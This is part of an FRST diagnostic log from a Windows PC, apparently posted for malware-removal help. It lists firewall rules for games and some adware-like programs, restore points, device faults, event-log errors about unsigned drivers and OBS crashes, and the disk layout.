FirewallRules: [{92332ADD-4121-4F3B-B11D-1E162442325D}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
FirewallRules: [{3C2DAF21-42E5-4231-ACA7-C55C1F5EB4A3}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [{A555EEF5-0B5D-47FA-8A66-618D19FDCF59}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [TCP Query User{988D249A-2BE6-49AE-A0EF-10582F8137AA}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe
FirewallRules: [UDP Query User{DA7F5540-AEF2-4539-A9F7-763B01C89BCC}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe
FirewallRules: [TCP Query User{B904D007-955B-4916-AC07-455185C1CBA1}C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [UDP Query User{AD4B4F9E-0691-4533-81B7-A0B996EA51A1}C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [TCP Query User{9E95F336-F5C5-40D7-861E-83FFF5B31736}C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe] => (Allow) C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe
FirewallRules: [UDP Query User{BC3A3A53-32E1-4AB3-A54F-A13AC20B39CC}C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe] => (Allow) C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe
FirewallRules: [{0871F91C-7DD5-424B-BE37-D2503FBD346F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid32.exe
FirewallRules: [{A756F288-9F2E-45E3-AB78-439D9088BE7B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid32.exe
FirewallRules: [{3F563ACF-01AC-4FCA-85ED-EA37B3A7F485}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [{9379D05C-A530-4CE9-BAF0-A656004573AC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [TCP Query User{35F69FFE-40DF-4386-AC10-8C0D36D081C6}C:\program files (x86)\pure pool\purepool.exe] => (Allow) C:\program files (x86)\pure pool\purepool.exe
FirewallRules: [UDP Query User{1A92EF19-97C2-4374-80ED-D2D7B7C99700}C:\program files (x86)\pure pool\purepool.exe] => (Allow) C:\program files (x86)\pure pool\purepool.exe
FirewallRules: [TCP Query User{E57231F6-21D9-4A64-8411-A4E0523EDBC1}C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe
FirewallRules: [UDP Query User{57E65EC3-AF57-4BCA-B676-8496D927DF02}C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe
FirewallRules: [TCP Query User{550FA9C1-B1E9-4129-81E8-27A356AF91FD}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{8875A142-BD97-4C56-B104-22508F4908B3}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [{116CC472-97BB-45E1-9CA6-8D5CF09DFE59}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{BE10513A-94A9-418D-8A00-16A22A41FB64}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E82DF90D-8295-4E1C-BC3D-BD07E981363A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{07FE4630-9E5E-4153-83DD-FE613F95761C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [TCP Query User{2104931F-149A-44C0-8F85-BDE3C80431BF}C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe
FirewallRules: [UDP Query User{B42278A1-1A63-493D-8F51-12BE515F244A}C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe
FirewallRules: [TCP Query User{3A9BEA93-7DA6-4947-B1AF-5474A0F818A7}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{B1D34AE1-BBD3-4ADD-9391-BC89E915C297}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{CC05D236-5285-44FE-BE3C-412687B6D67C}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{9BFEA870-D85D-4895-81D4-F4614FF6B0C6}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{4B3C5454-A646-45BF-A3F0-D4885D8A31CF}C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe] => (Allow) C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe
FirewallRules: [UDP Query User{597C47E7-0119-42AC-9391-8817E13875AB}C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe] => (Allow) C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe
FirewallRules: [TCP Query User{26DE1C8B-6AF7-43DA-9176-4C5D81BAC221}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{270B20B7-F928-4945-8B3F-8F0B924FD0B1}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{0853AF47-E170-4B7D-A706-8CD5BC1E0F7F}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [UDP Query User{32EC7D15-A105-40A6-82C0-F9CBCD8D7773}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [TCP Query User{E13477D5-D782-42C2-A699-34AFA7E078FB}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [UDP Query User{B5350CE2-41EB-4585-AFD1-B48671A29251}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [{3FB40881-A55B-4AB9-B43C-282E0EA45BA5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{764C0F3F-D951-4B1B-B83B-B3FE23F920D7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{C0DDC65F-1D01-4A49-8C7F-E270F8D9E8A2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{2A59798D-9A43-46F5-A74D-1BFE9281B119}] => (Allow) C:\Windows\SysWOW64\SurfShield.exe
FirewallRules: [{E6A70596-328B-4304-A1E4-D66E080C28C4}] => (Allow) C:\Windows\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
FirewallRules: [TCP Query User{26C5384F-A329-45CB-9871-71EF2DB92735}C:\users\hp\desktop\texture-studio-master\samp-server.exe] => (Allow) C:\users\hp\desktop\texture-studio-master\samp-server.exe
FirewallRules: [UDP Query User{636ADC8C-9A7E-4C6E-89D8-1D9006A3DF2F}C:\users\hp\desktop\texture-studio-master\samp-server.exe] => (Allow) C:\users\hp\desktop\texture-studio-master\samp-server.exe
==================== Restore Points =========================
19-04-2017 08:05:40 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215
19-04-2017 08:07:20 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
19-04-2017 16:00:23 Windows Update
21-04-2017 07:49:48 Windows Update
21-04-2017 10:10:40 Windows Update
21-04-2017 20:00:16 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215
21-04-2017 20:00:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210
21-04-2017 20:01:28 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
21-04-2017 20:01:56 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210
==================== Faulty Device Manager Devices =============
Name:
Description:
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
Name: USB Input Device
Description: USB Input Device
Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Manufacturer: (Standard system devices)
Service: HidUsb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
==================== Event log errors: =========================
Application errors:
==================
Error: (04/22/2017 12:17:55 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program samp.exe version 0.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: a24
Start Time: 01d2bb4944768846
Termination Time: 9
Application Path: C:\Games\Grand Theft Auto SA-MP\samp.exe
Report Id: 8fbf5fe5-273c-11e7-8046-acd1b80f54a8
Error: (04/22/2017 08:30:58 AM) (Source: EventSystem) (EventID: 4621) (User: )
Description: The COM+ Event System could not remove the EventSystem.EventSubscription object {F55E4282-CE4F-4785-B5C8-29D60709F8AF}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}.
Object name: SENS Logon Subscription
Object description:
The HRESULT was 80070005.
Error: (04/21/2017 03:44:16 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
Program: obs64.exe
File:
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
Additional Data
Error value: 00000000
Disk type: 0
Error: (04/21/2017 03:44:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x17d4
Faulting application start time: 0x01d2ba9cfcb6a872
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 3a6b596a-2690-11e7-b252-acd1b80f54a8
Error: (04/21/2017 03:43:36 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
Program: obs64.exe
File:
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
Additional Data
Error value: 00000000
Disk type: 0
Error: (04/21/2017 03:43:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x1cf8
Faulting application start time: 0x01d2ba9ce4e8b647
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 229ca3ec-2690-11e7-b252-acd1b80f54a8
Error: (04/21/2017 03:43:14 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
Program: obs64.exe
File:
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
Additional Data
Error value: 00000000
Disk type: 0
Error: (04/21/2017 03:43:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x1eb0
Faulting application start time: 0x01d2ba9cd7e9f401
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 15a4987f-2690-11e7-b252-acd1b80f54a8
Error: (04/21/2017 03:42:48 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
Program: obs64.exe
File:
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
Additional Data
Error value: 00000000
Disk type: 0
Error: (04/21/2017 03:42:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x1990
Faulting application start time: 0x01d2ba9cc7f7892b
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 05aada8d-2690-11e7-b252-acd1b80f54a8
System errors:
=============
Error: (04/22/2017 08:57:10 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {820D63D5-8CFF-46DE-86AF-4997DEDD6DB5} did not register with DCOM within the required timeout.
Error: (04/22/2017 08:56:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The atksgt service failed to start due to the following error:
Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Error: (04/22/2017 08:50:27 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
Error: (04/22/2017 08:50:26 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
Error: (04/22/2017 08:50:26 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
Error: (04/22/2017 08:50:25 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
Error: (04/22/2017 08:50:24 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
Error: (04/22/2017 08:50:24 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
Error: (04/22/2017 08:50:22 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
Error: (04/22/2017 08:50:21 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
CodeIntegrity:
===================================
Date: 2017-04-22 08:56:34.806
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:56:34.806
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:48:57.263
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:48:57.247
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:38:27.771
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:38:27.771
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:32:26.489
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:32:26.489
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:03:04.835
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2017-04-22 08:03:04.833
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel® Core i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 50%
Total physical RAM: 4032.3 MB
Available physical RAM: 2009.74 MB
Total Virtual: 8062.74 MB
Available Virtual: 5440.58 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:146.39 GB) (Free:87.1 GB) NTFS
Drive d: () (Fixed) (Total:319.28 GB) (Free:319.18 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 397A8933)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=146.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=319.3 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
Edited by Khazard, 22 April 2017 - 08:03 AM.